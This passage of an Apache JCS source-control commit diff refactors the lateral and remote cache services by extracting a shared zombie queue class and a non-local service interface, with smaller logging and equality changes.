@@ { log.debug( "Called addNoWait, isNew = " + isNew ); } + return isNew; } else { - if ( log.isInfoEnabled() ) + if ( !knownDifferentlyConfiguredRegions.contains( noWait.getCacheName() ) ) { - log.info( "addNoWait > Different nodes are configured differently or region [" + noWait.getCacheName() - + "] is not yet used on this side. " ); + if ( log.isInfoEnabled() ) + { + log.info( "addNoWait > Different nodes are configured differently or region [" + + noWait.getCacheName() + "] is not yet used on this side. " ); + } + knownDifferentlyConfiguredRegions.add( noWait.getCacheName() ); } + return false; } } @@ -121,13 +167,14 @@ * use with the lateral cache. If it is present, remove the item from the no wait list. * <p> * @param noWait + * @return true if we found the no wait and removed it. False if the no wait was not present. */ - protected void removeNoWait( LateralCacheNoWait noWait ) + protected boolean removeNoWait( LateralCacheNoWait noWait ) { LateralCacheNoWaitFacade facade = (LateralCacheNoWaitFacade) facades.get( noWait.getCacheName() ); if ( log.isDebugEnabled() ) { - log.debug( "Got facade for " + noWait.getCacheName() + " = " + facade ); + log.debug( "removeNoWait > Got facade for " + noWait.getCacheName() + " = " + facade ); } if ( facade != null ) @@ -137,14 +184,20 @@ { log.debug( "Called removeNoWait, removed " + removed ); } + return removed; } else { - if ( log.isInfoEnabled() ) + if ( !knownDifferentlyConfiguredRegions.contains( noWait.getCacheName() ) ) { - log.info( "removeNoWait > Different nodes are configured differently or region [" - + noWait.getCacheName() + "] is not yet used on this side. " ); + if ( log.isInfoEnabled() ) + { + log.info( "removeNoWait > Different nodes are configured differently or region [" + + noWait.getCacheName() + "] is not yet used on this side. " ); + } + knownDifferentlyConfiguredRegions.add( noWait.getCacheName() ); } + return false; } } @@ -155,7 +208,7 @@ * force a full configuration of the region. One advantage of this would be that the creation of * the later would go through the factory, which would add the item to the no wait list. But we * don't want to do this. This would force this client to have all the regions as the other. - * This might not be desired. We don't want to send or recieve for a region here that is either + * This might not be desired. We don't want to send or receive for a region here that is either * not used or not configured to use the lateral. * <p> * Right now, I'm afraid that the region will get puts if another instance has the region Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerManager.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerManager.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerManager.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerManager.java Thu Jul 23 18:27:41 2009 @@ -57,11 +57,11 @@ { ins = new LateralTCPDiscoveryListener( cacheMgr, cacheEventLogger, elementSerializer ); - instances.put( String.valueOf( ilca.getTcpListenerPort() ), ins ); + instances.put( key, ins ); - if ( log.isDebugEnabled() ) + if ( log.isInfoEnabled() ) { - log.debug( "created new listener " + ilca.getTcpListenerPort() ); + log.info( "Created new discovery listener for " + key + " cacheName for request " + ilca.getCacheName() ); } } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPService.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPService.java Thu Jul 23 18:27:41 2009 @@ -176,7 +176,8 @@ } /** - * Does nothing. <p. + * Does nothing. + * <p> * @throws IOException */ public void release() @@ -226,6 +227,21 @@ public ICacheElement get( String cacheName, Serializable key ) throws IOException { + return get( cacheName, key, getListenerId() ); + } + + /** + * If get is allowed, we will issues a get request. + * <p> + * @param cacheName + * @param key + * @param requesterId + * @return ICacheElement if found. + * @throws IOException + */ + public ICacheElement get( String cacheName, Serializable key, long requesterId ) + throws IOException + { // if get is not allowed return if ( this.getTcpLateralCacheAttributes().isAllowGet() ) { @@ -248,7 +264,7 @@ } /** - * The service does not get via this method, so this return empty. + * If allow get is true, we will issue a getmatching query. * <p> * @param cacheName * @param pattern @@ -259,6 +275,22 @@ public Map getMatching( String cacheName, String pattern ) throws IOException { + return getMatching( cacheName, pattern, getListenerId() ); + } + + /** + * If allow get is true, we will issue a getmatching query. + * <p> + * @param cacheName + * @param pattern + * @param requesterId - our identity + * @return a map of Serializable key to ICacheElement element, or an empty map if there is no + * data in cache matching the pattern. + * @throws IOException + */ + public Map getMatching( String cacheName, String pattern, long requesterId ) + throws IOException + { // if get is not allowed return if ( this.getTcpLateralCacheAttributes().isAllowGet() ) { @@ -266,7 +298,7 @@ LateralElementDescriptor led = new LateralElementDescriptor( ce ); // led.requesterId = requesterId; // later led.command = LateralElementDescriptor.GET_MATCHING; - + Object response = sender.sendAndReceive( led ); if ( response != null ) { @@ -280,7 +312,7 @@ return null; } } - + /** * Gets multiple items from the cache based on the given set of keys. * <p> @@ -293,6 +325,24 @@ public Map getMultiple( String cacheName, Set keys ) throws IOException { + return getMultiple( cacheName, keys, getListenerId() ); + } + + /** + * This issues a separate get for each item. + * <p> + * TODO We should change this. It should issue one request. + * <p> + * @param cacheName + * @param keys + * @param requesterId + * @return a map of Serializable key to ICacheElement element, or an empty map if there is no + * data in cache for any of these keys + * @throws IOException + */ + public Map getMultiple( String cacheName, Set keys, long requesterId ) + throws IOException + { Map elements = new HashMap(); if ( keys != null && !keys.isEmpty() ) @@ -311,7 +361,6 @@ } } } - return elements; } @@ -463,5 +512,4 @@ { return tcpLateralCacheAttributes; } - } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/behavior/ITCPLateralCacheAttributes.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/behavior/ITCPLateralCacheAttributes.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/behavior/ITCPLateralCacheAttributes.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/behavior/ITCPLateralCacheAttributes.java Thu Jul 23 18:27:41 2009 @@ -214,5 +214,5 @@ /** * @return the openTimeOut */ - public int getOpenTimeOut(); + public int getOpenTimeOut(); } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/remote/ZombieRemoteCacheService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/remote/ZombieRemoteCacheService.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/remote/ZombieRemoteCacheService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/remote/ZombieRemoteCacheService.java Thu Jul 23 18:27:41 2009 @@ -19,20 +19,8 @@ * under the License. */ -import java.io.IOException; -import java.io.Serializable; -import java.util.Collections; -import java.util.HashMap; -import java.util.Map; -import java.util.Set; - -import org.apache.commons.logging.Log; -import org.apache.commons.logging.LogFactory; import org.apache.jcs.auxiliary.remote.behavior.IRemoteCacheService; -import org.apache.jcs.engine.ZombieCacheService; -import org.apache.jcs.engine.behavior.ICacheElement; -import org.apache.jcs.utils.struct.BoundedQueue; -import org.apache.jcs.utils.timing.ElapsedTimer; +import org.apache.jcs.engine.ZombieCacheServiceNonLocal; /** * Zombie adapter for the remote cache service. It just balks if there is no queue configured. @@ -41,29 +29,20 @@ * operation is restored, the remote cache will walk the queue. The queue must be bounded so it does * not eat memory. * <p> - * Much of this is potentially reusable. - * <p> - * TODO figure out a way to get the propagate method into an interface for Zombies. + * Much of this was reusable, so I moved it to engine. */ public class ZombieRemoteCacheService - extends ZombieCacheService + extends ZombieCacheServiceNonLocal implements IRemoteCacheService { - /** The logger */ - private final static Log log = LogFactory.getLog( ZombieRemoteCacheService.class ); - - /** How big can the queue grow. */ - private int maxQueueSize = 0; - - /** The queue */ - private BoundedQueue queue; + // backwards compatibility /** - * Default. + * We shouldn't be using this. It's only called on certain startup errors. */ public ZombieRemoteCacheService() { - queue = new BoundedQueue( 0 ); + super(); } /** @@ -73,238 +52,6 @@ */ public ZombieRemoteCacheService( int maxQueueSize ) { - this.maxQueueSize = maxQueueSize; - queue = new BoundedQueue( maxQueueSize ); - } - - /** - * Gets the number of items on the queue. - * <p> - * @return size of the queue. - */ - public int getQueueSize() - { - return queue.size(); - } - - /** - * Adds an update event to the queue if the maxSize is greater than 0; - * <p> - * (non-Javadoc) - * @see org.apache.jcs.auxiliary.remote.behavior.IRemoteCacheService#update(org.apache.jcs.engine.behavior.ICacheElement, - * long) - */ - public void update( ICacheElement item, long listenerId ) - { - if ( maxQueueSize > 0 ) - { - PutEvent event = new PutEvent( item, listenerId ); - queue.add( event ); - } - // Zombies have no inner life - return; - } - - /** - * Adds a removeAll event to the queue if the maxSize is greater than 0; - * <p> - * (non-Javadoc) - * @see org.apache.jcs.auxiliary.remote.behavior.IRemoteCacheService#remove(java.lang.String, - * java.io.Serializable, long) - */ - public void remove( String cacheName, Serializable key, long listenerId ) - { - if ( maxQueueSize > 0 ) - { - RemoveEvent event = new RemoveEvent( cacheName, key, listenerId ); - queue.add( event ); - } - // Zombies have no inner life - return; - } - - /** - * Adds a removeAll event to the queue if the maxSize is greater than 0; - * <p> - * (non-Javadoc) - * @see org.apache.jcs.auxiliary.remote.behavior.IRemoteCacheService#removeAll(java.lang.String, - * long) - */ - public void removeAll( String cacheName, long listenerId ) - { - if ( maxQueueSize > 0 ) - { - RemoveAllEvent event = new RemoveAllEvent( cacheName, listenerId ); - queue.add( event ); - } - // Zombies have no inner life - return; - } - - /** - * Does nothing. Gets are synchronous and cannot be added to a queue. - * <p> - * (non-Javadoc) - * @see org.apache.jcs.auxiliary.remote.behavior.IRemoteCacheService#get(java.lang.String, - * java.io.Serializable, long) - */ - public ICacheElement get( String cacheName, Serializable key, long requesterId ) - throws IOException - { - // Zombies have no inner life - return null; - } - - /** - * @param cacheName - * @param pattern - * @param requesterId - * @return empty map - * @throws IOException - * - */ - public Map getMatching( String cacheName, String pattern, long requesterId ) - throws IOException - { - return Collections.EMPTY_MAP; - } - - /** - * @param cacheName - * @param keys - * @param requesterId - * @return an empty map. zombies have no internal data - */ - public Map getMultiple( String cacheName, Set keys, long requesterId ) - { - return new HashMap(); - } - - /** - * Does nothing. - * <p> - * (non-Javadoc) - * @see org.apache.jcs.auxiliary.remote.behavior.IRemoteCacheService#getGroupKeys(java.lang.String, - * java.lang.String) - */ - public Set getGroupKeys( String cacheName, String groupName ) - { - return Collections.EMPTY_SET; - } - - /** - * Walk the queue, calling the service for each queue operation. - * <p> - * @param service - * @throws Exception - */ - protected void propagateEvents( IRemoteCacheService service ) - throws Exception - { - int cnt = 0; - if ( log.isInfoEnabled() ) - { - log.info( "Propagating events to the new RemoteService." ); - } - ElapsedTimer timer = new ElapsedTimer(); - while ( !queue.isEmpty() ) - { - cnt++; - - // for each item, call the appropriate service method - ZombieEvent event = (ZombieEvent) queue.take(); - - if ( event instanceof PutEvent ) - { - PutEvent putEvent = (PutEvent) event; - service.update( putEvent.element, event.requesterId ); - } - else if ( event instanceof RemoveEvent ) - { - RemoveEvent removeEvent = (RemoveEvent) event; - service.remove( event.cacheName, removeEvent.key, event.requesterId ); - } - else if ( event instanceof RemoveAllEvent ) - { - service.removeAll( event.cacheName, event.requesterId ); - } - } - if ( log.isInfoEnabled() ) - { - log.info( "Propagated " + cnt + " events to the new RemoteService in " + timer.getElapsedTimeString() ); - } - } - - /** - * Base of the other events. - */ - private abstract class ZombieEvent - { - /** The name of the region. */ - String cacheName; - - /** The id of the requester */ - long requesterId; - } - - /** - * A basic put event. - */ - private class PutEvent - extends ZombieEvent - { - /** The element to put */ - ICacheElement element; - - /** - * Set the element - * @param element - * @param requesterId - */ - public PutEvent( ICacheElement element, long requesterId ) - { - this.requesterId = requesterId; - this.element = element; - } - } - - /** - * A basic Remove event. - */ - private class RemoveEvent - extends ZombieEvent - { - /** The key to remove */ - Serializable key; - - /** - * Set the element - * @param cacheName - * @param key - * @param requesterId - */ - public RemoveEvent( String cacheName, Serializable key, long requesterId ) - { - this.cacheName = cacheName; - this.requesterId = requesterId; - this.key = key; - } - } - - /** - * A basic RemoveAll event. - */ - private class RemoveAllEvent - extends ZombieEvent - { - /** - * @param cacheName - * @param requesterId - */ - public RemoveAllEvent( String cacheName, long requesterId ) - { - this.cacheName = cacheName; - this.requesterId = requesterId; - } + super( maxQueueSize ); } } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/remote/behavior/IRemoteCacheService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/remote/behavior/IRemoteCacheService.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/remote/behavior/IRemoteCacheService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/remote/behavior/IRemoteCacheService.java Thu Jul 23 18:27:41 2009 @@ -19,101 +19,15 @@ * under the License. */ -import java.io.IOException; -import java.io.Serializable; -import java.rmi.Remote; -import java.util.Map; -import java.util.Set; - -import org.apache.jcs.access.exception.ObjectExistsException; -import org.apache.jcs.engine.behavior.ICacheElement; -import org.apache.jcs.engine.behavior.ICacheService; +import org.apache.jcs.engine.behavior.ICacheServiceNonLocal; /** * Used to retrieve and update the remote cache. + * <p> + * For convenience, ICacheServiceNonLocal extends Remote. */ public interface IRemoteCacheService - extends Remote, ICacheService + extends ICacheServiceNonLocal { - /** - * Puts a cache item to the cache. - * <p> - * @param item - * @param requesterId - * @throws ObjectExistsException - * @throws IOException - */ - void update( ICacheElement item, long requesterId ) - throws ObjectExistsException, IOException; - - /** - * Removes the given key from the specified cache. - * <p> - * @param cacheName - * @param key - * @param requesterId - * @throws IOException - */ - void remove( String cacheName, Serializable key, long requesterId ) - throws IOException; - - /** - * Remove all keys from the specified cache. - * <p> - * @param cacheName - * @param requesterId - * @throws IOException - */ - void removeAll( String cacheName, long requesterId ) - throws IOException; - - /** - * Returns a cache bean from the specified cache; or null if the key does not exist. - * <p> - * Adding the requestor id, allows the cache to determine the sournce of the get. - * <p> - * @param cacheName - * @param key - * @param requesterId - * @return ICacheElement - * @throws IOException - */ - ICacheElement get( String cacheName, Serializable key, long requesterId ) - throws IOException; - - /** - * Gets multiple items from the cache based on the given set of keys. - * <p> - * @param cacheName - * @param keys - * @param requesterId - * @return a map of Serializable key to ICacheElement element, or an empty map if there is no - * data in cache for any of these keys - * @throws IOException - */ - Map getMultiple( String cacheName, Set keys, long requesterId ) - throws IOException; - - /** - * Gets multiple items from the cache matching the pattern. - * <p> - * @param cacheName - * @param pattern - * @param requesterId - * @return a map of Serializable key to ICacheElement element, or an empty map if there is no - * data in cache matching the pattern. - * @throws IOException - */ - Map getMatching( String cacheName, String pattern, long requesterId ) - throws IOException; - - /** - * @param cacheName - * @param groupName - * @return A Set of keys - * @throws java.rmi.RemoteException - * @throws IOException - */ - Set getGroupKeys( String cacheName, String groupName ) - throws java.rmi.RemoteException, IOException; + // backwards compatibility } Added: jakarta/jcs/trunk/src/java/org/apache/jcs/engine/ZombieCacheServiceNonLocal.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/engine/ZombieCacheServiceNonLocal.java?rev=797178&view=auto ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/engine/ZombieCacheServiceNonLocal.java (added) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/engine/ZombieCacheServiceNonLocal.java Thu Jul 23 18:27:41 2009 @@ -0,0 +1,309 @@ +package org.apache.jcs.engine; + +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + +import java.io.IOException; +import java.io.Serializable; +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; +import java.util.Set; + +import org.apache.commons.logging.Log; +import org.apache.commons.logging.LogFactory; +import org.apache.jcs.engine.behavior.ICacheElement; +import org.apache.jcs.engine.behavior.ICacheServiceNonLocal; +import org.apache.jcs.utils.struct.BoundedQueue; +import org.apache.jcs.utils.timing.ElapsedTimer; + +/** + * Zombie adapter for the non local cache services. It just balks if there is no queue configured. + * <p> + * If a queue is configured, then events will be added to the queue. The idea is that when proper + * operation is restored, the non local cache will walk the queue. The queue must be bounded so it + * does not eat memory. + * <p> + * This originated in the remote cache. + */ +public class ZombieCacheServiceNonLocal + extends ZombieCacheService + implements ICacheServiceNonLocal +{ + /** The logger */ + private final static Log log = LogFactory.getLog( ZombieCacheServiceNonLocal.class ); + + /** How big can the queue grow. */ + private int maxQueueSize = 0; + + /** The queue */ + private BoundedQueue queue; + + /** + * Default. + */ + public ZombieCacheServiceNonLocal() + { + queue = new BoundedQueue( 0 ); + } + + /** + * Sets the maximum number of items that will be allowed on the queue. + * <p> + * @param maxQueueSize + */ + public ZombieCacheServiceNonLocal( int maxQueueSize ) + { + this.maxQueueSize = maxQueueSize; + queue = new BoundedQueue( maxQueueSize ); + } + + /** + * Gets the number of items on the queue. + * <p> + * @return size of the queue. + */ + public int getQueueSize() + { + return queue.size(); + } + + /** + * Adds an update event to the queue if the maxSize is greater than 0; + * <p> + * @param item ICacheElement + * @param listenerId - identifies the caller. + */ + public void update( ICacheElement item, long listenerId ) + { + if ( maxQueueSize > 0 ) + { + PutEvent event = new PutEvent( item, listenerId ); + queue.add( event ); + } + // Zombies have no inner life + return; + } + + /** + * Adds a removeAll event to the queue if the maxSize is greater than 0; + * <p> + * @param cacheName - region name + * @param key - item key + * @param listenerId - identifies the caller. + */ + public void remove( String cacheName, Serializable key, long listenerId ) + { + if ( maxQueueSize > 0 ) + { + RemoveEvent event = new RemoveEvent( cacheName, key, listenerId ); + queue.add( event ); + } + // Zombies have no inner life + return; + } + + /** + * Adds a removeAll event to the queue if the maxSize is greater than 0; + * <p> + * @param cacheName - name of the region + * @param listenerId - identifies the caller. + */ + public void removeAll( String cacheName, long listenerId ) + { + if ( maxQueueSize > 0 ) + { + RemoveAllEvent event = new RemoveAllEvent( cacheName, listenerId ); + queue.add( event ); + } + // Zombies have no inner life + return; + } + + /** + * Does nothing. Gets are synchronous and cannot be added to a queue. + * <p> + * @param cacheName - region name + * @param key - item key + * @param requesterId - identifies the caller. + * @return null + * @throws IOException + */ + public ICacheElement get( String cacheName, Serializable key, long requesterId ) + throws IOException + { + // Zombies have no inner life + return null; + } + + /** + * Does nothing. + * <p> + * @param cacheName + * @param pattern + * @param requesterId + * @return empty map + * @throws IOException + */ + public Map getMatching( String cacheName, String pattern, long requesterId ) + throws IOException + { + return Collections.EMPTY_MAP; + } + + /** + * @param cacheName - region name + * @param keys - item key + * @param requesterId - identity of the caller + * @return an empty map. zombies have no internal data + */ + public Map getMultiple( String cacheName, Set keys, long requesterId ) + { + return new HashMap(); + } + + /** + * Does nothing. + * <p> + * @param cacheName - region name + * @param groupName - group name + * @return empty set + */ + public Set getGroupKeys( String cacheName, String groupName ) + { + return Collections.EMPTY_SET; + } + + /** + * Walk the queue, calling the service for each queue operation. + * <p> + * @param service + * @throws Exception + */ + public synchronized void propagateEvents( ICacheServiceNonLocal service ) + throws Exception + { + int cnt = 0; + if ( log.isInfoEnabled() ) + { + log.info( "Propagating events to the new ICacheServiceNonLocal." ); + } + ElapsedTimer timer = new ElapsedTimer(); + while ( !queue.isEmpty() ) + { + cnt++; + + // for each item, call the appropriate service method + ZombieEvent event = (ZombieEvent) queue.take(); + + if ( event instanceof PutEvent ) + { + PutEvent putEvent = (PutEvent) event; + service.update( putEvent.element, event.requesterId ); + } + else if ( event instanceof RemoveEvent ) + { + RemoveEvent removeEvent = (RemoveEvent) event; + service.remove( event.cacheName, removeEvent.key, event.requesterId ); + } + else if ( event instanceof RemoveAllEvent ) + { + service.removeAll( event.cacheName, event.requesterId ); + } + } + if ( log.isInfoEnabled() ) + { + log.info( "Propagated " + cnt + " events to the new ICacheServiceNonLocal in " + + timer.getElapsedTimeString() ); + } + } + + /** + * Base of the other events. + */ + private abstract class ZombieEvent + { + /** The name of the region. */ + String cacheName; + + /** The id of the requester */ + long requesterId; + } + + /** + * A basic put event. + */ + private class PutEvent + extends ZombieEvent + { + /** The element to put */ + ICacheElement element; + + /** + * Set the element + * @param element + * @param requesterId + */ + public PutEvent( ICacheElement element, long requesterId ) + { + this.requesterId = requesterId; + this.element = element; + } + } + + /** + * A basic Remove event. + */ + private class RemoveEvent + extends ZombieEvent + { + /** The key to remove */ + Serializable key; + + /** + * Set the element + * @param cacheName + * @param key + * @param requesterId + */ + public RemoveEvent( String cacheName, Serializable key, long requesterId ) + { + this.cacheName = cacheName; + this.requesterId = requesterId; + this.key = key; + } + } + + /** + * A basic RemoveAll event. + */ + private class RemoveAllEvent + extends ZombieEvent + { + /** + * @param cacheName + * @param requesterId + */ + public RemoveAllEvent( String cacheName, long requesterId ) + { + this.cacheName = cacheName; + this.requesterId = requesterId; + } + } +} Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/engine/behavior/ICacheService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/engine/behavior/ICacheService.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/engine/behavior/ICacheService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/engine/behavior/ICacheService.java Thu Jul 23 18:27:41 2009 @@ -28,8 +28,8 @@ import org.apache.jcs.access.exception.ObjectNotFoundException; /** - * Used to retrieve and update the cache. <br> - * <br> + * Used to retrieve and update the cache. + * <p> * Note: server which implements this interface provides a local cache service, whereas server which * implements IRmiCacheService provides a remote cache service. */ @@ -60,11 +60,12 @@ /** * Gets multiple items from the cache based on the given set of keys. * <p> - * @param cacheName + * @param cacheName * @param keys - * @return a map of Serializable key to ICacheElement element, or an empty map if there is no data in cache for any of these keys - * @throws ObjectNotFoundException - * @throws IOException + * @return a map of Serializable key to ICacheElement element, or an empty map if there is no + * data in cache for any of these keys + * @throws ObjectNotFoundException + * @throws IOException */ Map getMultiple( String cacheName, Set keys ) throws ObjectNotFoundException, IOException; @@ -80,7 +81,7 @@ */ Map getMatching( String cacheName, String pattern ) throws IOException; - + /** * Removes the given key from the specified cache. * <p> Added: jakarta/jcs/trunk/src/java/org/apache/jcs/engine/behavior/ICacheServiceNonLocal.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/engine/behavior/ICacheServiceNonLocal.java?rev=797178&view=auto ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/engine/behavior/ICacheServiceNonLocal.java (added) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/engine/behavior/ICacheServiceNonLocal.java Thu Jul 23 18:27:41 2009 @@ -0,0 +1,119 @@ +package org.apache.jcs.engine.behavior; + +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + +import java.io.IOException; +import java.io.Serializable; +import java.rmi.Remote; +import java.util.Map; +import java.util.Set; + +/** + * Used to retrieve and update non local caches, such as the remote and lateral caches. Unlike + * ICacheService, the methods here have a requester id. This allows us to avoid propagating events + * to ourself. + * <p> + * TODO consider not extending ICacheService + */ +public interface ICacheServiceNonLocal + extends Remote, ICacheService +{ + /** + * Puts a cache item to the cache. + * <p> + * @param item + * @param requesterId + * @throws IOException + */ + void update( ICacheElement item, long requesterId ) + throws IOException; + + /** + * Removes the given key from the specified cache. + * <p> + * @param cacheName + * @param key + * @param requesterId + * @throws IOException + */ + void remove( String cacheName, Serializable key, long requesterId ) + throws IOException; + + /** + * Remove all keys from the specified cache. + * <p> + * @param cacheName + * @param requesterId + * @throws IOException + */ + void removeAll( String cacheName, long requesterId ) + throws IOException; + + /** + * Returns a cache bean from the specified cache; or null if the key does not exist. + * <p> + * Adding the requestor id, allows the cache to determine the sournce of the get. + * <p> + * @param cacheName + * @param key + * @param requesterId + * @return ICacheElement + * @throws IOException + */ + ICacheElement get( String cacheName, Serializable key, long requesterId ) + throws IOException; + + /** + * Gets multiple items from the cache based on the given set of keys. + * <p> + * @param cacheName + * @param keys + * @param requesterId + * @return a map of Serializable key to ICacheElement element, or an empty map if there is no + * data in cache for any of these keys + * @throws IOException + */ + Map getMultiple( String cacheName, Set keys, long requesterId ) + throws IOException; + + /** + * Gets multiple items from the cache matching the pattern. + * <p> + * @param cacheName + * @param pattern + * @param requesterId + * @return a map of Serializable key to ICacheElement element, or an empty map if there is no + * data in cache matching the pattern. + * @throws IOException + */ + Map getMatching( String cacheName, String pattern, long requesterId ) + throws IOException; + + /** + * Likely not implemented. This probably should be deprecated. + * <p> + * @param cacheName + * @param groupName + * @return A Set of keys + * @throws IOException + */ + Set getGroupKeys( String cacheName, String groupName ) + throws IOException; +} Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java Thu Jul 23 18:27:41 2009 @@ -113,21 +113,25 @@ return lastHearFromTime; } - /** @return hashcode based on address/port/name */ + /** @return hashcode based on address/port */ public int hashCode() { HashCodeBuilder builder = new HashCodeBuilder(); builder.append( this.getServiceAddress() ); builder.append( this.getServicePort() ); - builder.append( this.getCacheNames() ); + //builder.append( this.getCacheNames().toString() ); return builder.toHashCode(); } /** * NOTE - this object is often put into sets, so equals needs to be overridden. * <p> + * We can't use cache names as part of the equals unless we manually only use the address and + * port in a contains check. So that we can use normal set functionality, I've kept the cache + * names out. + * <p> * @param otherArg other - * @return equality based on the address/port/name + * @return equality based on the address/port */ public boolean equals( Object otherArg ) { @@ -137,7 +141,7 @@ EqualsBuilder builder = new EqualsBuilder(); builder.append( this.getServiceAddress(), other.getServiceAddress() ); builder.append( this.getServicePort(), other.getServicePort() ); - builder.append( this.getCacheNames(), other.getCacheNames() ); + //builder.append( this.getCacheNames().toString(), other.getCacheNames().toString() ); return builder.isEquals(); } return false; Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java Thu Jul 23 18:27:41 2009 @@ -46,9 +46,9 @@ */ protected void setCacheNames( ArrayList cacheNames ) { - if ( log.isDebugEnabled() ) + if ( log.isInfoEnabled() ) { - log.debug( "Resetting cacheNames = [" + cacheNames + "]" ); + log.info( "Resetting cacheNames = [" + cacheNames + "]" ); } this.cacheNames = cacheNames; } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java Thu Jul 23 18:27:41 2009 @@ -124,7 +124,7 @@ // create a sender thread sender = new UDPDiscoverySenderThread( getUdpDiscoveryAttributes(), getCacheNames() ); - senderDaemon.executePeriodically( 15 * 1000, sender, true ); + senderDaemon.executePeriodically( 15 * 1000, sender, true ); // add the cleanup daemon too cleanup = new UDPCleanupRunner( this ); @@ -206,7 +206,7 @@ public void removeDiscoveredService( DiscoveredService service ) { boolean contained = getDiscoveredServices().remove( service ); - + if ( contained ) { if ( log.isInfoEnabled() ) @@ -214,7 +214,7 @@ log.info( "Removing " + service ); } } - + Iterator it = getDiscoveryListeners().iterator(); while ( it.hasNext() ) { @@ -229,50 +229,73 @@ */ protected void addOrUpdateService( DiscoveredService discoveredService ) { - // Since this is a set we can add it over an over. - // We want to replace the old one, since we may add info that is not part of the equals. - // The equals method on the object being added is intentionally restricted. - if ( !getDiscoveredServices().contains( discoveredService ) ) + synchronized ( 